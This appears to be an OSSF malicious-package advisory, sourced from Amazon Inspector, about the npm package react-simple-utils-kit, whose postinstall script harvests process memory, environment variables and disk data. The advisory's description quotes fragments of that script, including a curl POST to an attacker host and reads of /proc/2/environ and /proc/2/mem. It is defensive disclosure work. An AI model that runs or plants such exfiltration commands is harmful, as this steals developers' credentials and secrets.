MAL-2026-6303
Vulnerability from ossf_malicious_packages
-= Per source details. Do not edit below this line.=-
Source: amazon-inspector (038aa6bccd8008fec1f309d718e53dd4b89e4ca15a976c6a80652e0dd58a5b58)
Package advertises itself as 'a simple date formatting utility for React projects' (3-function index.js), but ships a postinstall.js that runs on every `npm install` and performs an extensive reconnaissance + credential-harvest sweep against the installer's host, POSTing each result over plain HTTP to a hardcoded attacker endpoint at http://2e3bkumw.requestrepo.com (a one-shot request-interception domain unrelated to any legitimate publisher). postinstall.js:8 hardcodes `const BURL = 'http://2e3bkumw.requestrepo.com'` and postinstall.js:16 invokes ``execSync(`curl -s -m 8 -X POST -d @${tmpFile} ${BURL}/${key}...`)`` to ship results. Collected data includes: process capabilities and ptrace scope, strace attach against PID 2, raw memory reads of another process via `xxd /proc/2/mem`, that process's environment block via `cat /proc/2/environ` (commonly containing CI tokens and cloud credentials), `/proc/2/cmdline`, `ps aux`, listening-port enumeration, MCP probing on localhost:9000, and raw-disk reads from `/dev/vdb`. The package's name targets React developers via a date-utility cover story (empty author field, Chinese comment `绕过能力探测` = 'capability-detection bypass'); none of this behavior is consistent with the advertised purpose. Installer harm is concrete and immediate: any host running `npm install react-simple-utils-kit` leaks process-tree secrets, environment variables of other running processes, kernel/container introspection data, and raw block-device contents to attacker infrastructure.
- CWE-506 - The product contains code that appears to be malicious in nature.
{
"affected": [
{
"database_specific": {
"cwes": [
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
}
],
"indicators": {
"evidence_files": [
{
"path": "postinstall.js",
"sha256": "b732eaa4ee74b20bf8e24f406b074df840aec80e04fbca2eeb87a35077c08083",
"tlsh": "6971c6f9e9f39f70763a61a4315e60499efffc2a31527bd0e9684d68038de4a1123243"
},
{
"path": "package.json",
"sha256": "b5e4ea02a051ecf715a8a71fddead93d22a6b2f1f61b1ede3ba0e1d04e8b6e96",
"tlsh": "76e02614c9014f336fe8066948270912ba985e0b060c3c2c3387900c578f6ff80fe30d"
}
],
"package_integrity": [
{
"filename": "react-simple-utils-kit-1.3.2.tgz",
"hashes": {
"sha1": "d2707e8326457e097166a992b3679117b549bbb6",
"sha512_sri": "sha512-KcoQFBGF1NUtAzLMfcusQII729VIn/mUeQPkWYsLrVwB0rw9XLk8PIC+Z/kCA87z/eQInAiPWhd0V3VmpOaptw=="
}
}
]
}
},
"package": {
"ecosystem": "npm",
"name": "react-simple-utils-kit"
},
"versions": [
"1.3.2",
"1.2.2",
"1.0.2",
"1.4.2",
"1.3.3",
"1.3.1",
"1.0.5",
"1.0.1",
"1.3.0",
"1.4.0",
"1.1.0",
"1.4.1",
"1.0.4",
"1.2.0",
"1.0.0",
"1.2.1"
]
}
],
"credits": [
{
"contact": [
"inspector-research@amazon.com"
],
"name": "Amazon Inspector",
"type": "FINDER"
}
],
"database_specific": {
"malicious-packages-origins": [
{
"id": "IN-MAL-2026-007224",
"import_time": "2026-06-23T15:33:52.589644574Z",
"modified_time": "2026-06-23T14:46:47Z",
"sha256": "038aa6bccd8008fec1f309d718e53dd4b89e4ca15a976c6a80652e0dd58a5b58",
"source": "amazon-inspector",
"versions": [
"1.3.2"
]
},
{
"id": "IN-MAL-2026-007213",
"import_time": "2026-06-23T15:33:51.59318304Z",
"modified_time": "2026-06-23T14:46:38Z",
"sha256": "8886d4d16de552939e01d8bd472dd2b8dce46a0abf77d253cbcb09dae4830373",
"source": "amazon-inspector",
"versions": [
"1.2.2"
]
},
{
"id": "IN-MAL-2026-007215",
"import_time": "2026-06-23T15:33:51.691286744Z",
"modified_time": "2026-06-23T14:46:39Z",
"sha256": "b0b31ec7c4d366cc5f7f5a46466f414bba1a641964c6b997d30f9220f186bbbd",
"source": "amazon-inspector",
"versions": [
"1.0.2"
]
},
{
"id": "IN-MAL-2026-007209",
"import_time": "2026-06-23T15:33:51.303269095Z",
"modified_time": "2026-06-23T14:46:34Z",
"sha256": "b1ec8b00031d31e45f8ed1936395bd52f1ea16df4e652521b3732bafdbbff604",
"source": "amazon-inspector",
"versions": [
"1.4.2"
]
},
{
"id": "IN-MAL-2026-007219",
"import_time": "2026-06-23T15:33:52.244875464Z",
"modified_time": "2026-06-23T14:46:42Z",
"sha256": "bfeef9da283d7f26660e055fd2f70cf71c1231f13a3029971689bf9082098e88",
"source": "amazon-inspector",
"versions": [
"1.3.3"
]
},
{
"id": "IN-MAL-2026-007220",
"import_time": "2026-06-23T15:33:52.371047009Z",
"modified_time": "2026-06-23T14:46:43Z",
"sha256": "2e293c75200e773ed6bef24f23d483ffc71565dd465336318f240f06be8eb3ff",
"source": "amazon-inspector",
"versions": [
"1.3.1"
]
},
{
"id": "IN-MAL-2026-007218",
"import_time": "2026-06-23T15:33:52.190736749Z",
"modified_time": "2026-06-23T14:46:42Z",
"sha256": "66fb37d80d5b57c42447704336d28fa810af4c46c2cee5f2abac2452dd3b469b",
"source": "amazon-inspector",
"versions": [
"1.0.5"
]
},
{
"id": "IN-MAL-2026-007217",
"import_time": "2026-06-23T15:33:51.821002204Z",
"modified_time": "2026-06-23T14:46:41Z",
"sha256": "95a5ed56bbe208d78882a1026d8aa0b9e8659b3a85c1b9a849a0718907e1c342",
"source": "amazon-inspector",
"versions": [
"1.0.1"
]
},
{
"id": "IN-MAL-2026-007210",
"import_time": "2026-06-23T15:33:51.357235772Z",
"modified_time": "2026-06-23T14:46:35Z",
"sha256": "963d8f444d49da2d58e2c58cceff09bf9c685f38b03fd4286f8521e9b4701b9a",
"source": "amazon-inspector",
"versions": [
"1.3.0"
]
},
{
"id": "IN-MAL-2026-007211",
"import_time": "2026-06-23T15:33:51.499290605Z",
"modified_time": "2026-06-23T14:46:36Z",
"sha256": "e682e830cea8fa19e03a89aab70edc2259dbd0744d335cfc40de5ca0be2e2ca3",
"source": "amazon-inspector",
"versions": [
"1.4.0"
]
},
{
"id": "IN-MAL-2026-007222",
"import_time": "2026-06-23T15:33:52.475405356Z",
"modified_time": "2026-06-23T14:46:44Z",
"sha256": "716430e4a7dd41de65f4f46768c7db4ca994be72406c8e312a5955f60d4835d8",
"source": "amazon-inspector",
"versions": [
"1.1.0"
]
},
{
"id": "IN-MAL-2026-007212",
"import_time": "2026-06-23T15:33:51.540320712Z",
"modified_time": "2026-06-23T14:46:36Z",
"sha256": "8af4223f1220931d40aa0369b3d1590079e6c047f18ad29051f4fba20143ca88",
"source": "amazon-inspector",
"versions": [
"1.4.1"
]
},
{
"id": "IN-MAL-2026-007216",
"import_time": "2026-06-23T15:33:51.773768607Z",
"modified_time": "2026-06-23T14:46:40Z",
"sha256": "a1e740ad238b57435991e84637e4bf314c9154498ec231f9492c313ae364c71b",
"source": "amazon-inspector",
"versions": [
"1.0.4"
]
},
{
"id": "IN-MAL-2026-007223",
"import_time": "2026-06-23T15:33:52.534609606Z",
"modified_time": "2026-06-23T14:46:45Z",
"sha256": "9dda662ed01f939793fc3a67b24c2078f4ba731817f72623ba2b177b23f8a52f",
"source": "amazon-inspector",
"versions": [
"1.2.0"
]
},
{
"id": "IN-MAL-2026-007214",
"import_time": "2026-06-23T15:33:51.639177167Z",
"modified_time": "2026-06-23T14:46:38Z",
"sha256": "c78fcb17e3152afdb3f27b202c9e7d19735460a1bb6743ecf61e3e379a273eea",
"source": "amazon-inspector",
"versions": [
"1.0.0"
]
},
{
"id": "IN-MAL-2026-007221",
"import_time": "2026-06-23T15:33:52.434312415Z",
"modified_time": "2026-06-23T14:46:43Z",
"sha256": "d0dab6842ed9ed6871c0bc982363bd1ede197cbe269eb124a7ebc16f1d9dca0e",
"source": "amazon-inspector",
"versions": [
"1.2.1"
]
}
]
},
"details": "\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (038aa6bccd8008fec1f309d718e53dd4b89e4ca15a976c6a80652e0dd58a5b58)\nPackage advertises itself as \u0027a simple date formatting utility for React projects\u0027 (3-function index.js), but ships a postinstall.js that runs on every `npm install` and performs an extensive reconnaissance + credential-harvest sweep against the installer\u0027s host, POSTing each result over plain HTTP to a hardcoded attacker endpoint at http://2e3bkumw.requestrepo.com (a one-shot request-interception domain unrelated to any legitimate publisher). postinstall.js:8 hardcodes `const BURL = \u0027http://2e3bkumw.requestrepo.com\u0027` and postinstall.js:16 invokes `execSync(\\`curl -s -m 8 -X POST -d @${tmpFile} ${BURL}/${key}...\\`)` to ship results. Collected data includes: process capabilities and ptrace scope, strace attach against PID 2, raw memory reads of another process via `xxd /proc/2/mem`, that process\u0027s environment block via `cat /proc/2/environ` (commonly containing CI tokens and cloud credentials), `/proc/2/cmdline`, `ps aux`, listening-port enumeration, MCP probing on localhost:9000, and raw-disk reads from `/dev/vdb`. The package\u0027s name targets React developers via a date-utility cover story (empty author field, Chinese comment `\u7ed5\u8fc7\u80fd\u529b\u63a2\u6d4b` = \u0027capability-detection bypass\u0027); none of this behavior is consistent with the advertised purpose. Installer harm is concrete and immediate: any host running `npm install react-simple-utils-kit` leaks process-tree secrets, environment variables of other running processes, kernel/container introspection data, and raw block-device contents to attacker infrastructure.\n",
"id": "MAL-2026-6303",
"modified": "2026-06-23T15:35:56Z",
"published": "2026-06-23T14:46:34Z",
"references": [
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/react-simple-utils-kit/v/1.3.2"
},
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/react-simple-utils-kit/v/1.2.2"
},
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/react-simple-utils-kit/v/1.0.2"
},
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/react-simple-utils-kit/v/1.4.2"
},
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/react-simple-utils-kit/v/1.3.3"
},
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/react-simple-utils-kit/v/1.3.1"
},
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/react-simple-utils-kit/v/1.0.5"
},
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/react-simple-utils-kit/v/1.0.1"
},
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/react-simple-utils-kit/v/1.3.0"
},
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/react-simple-utils-kit/v/1.4.0"
},
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/react-simple-utils-kit/v/1.1.0"
},
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/react-simple-utils-kit/v/1.4.1"
},
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/react-simple-utils-kit/v/1.0.4"
},
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/react-simple-utils-kit/v/1.2.0"
},
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/react-simple-utils-kit/v/1.0.0"
},
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/react-simple-utils-kit/v/1.2.1"
}
],
"schema_version": "1.7.4",
"summary": "Malicious code in react-simple-utils-kit (npm)"
}
Sightings
| Author | Source | Type | Date | Other |
|---|---|---|---|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.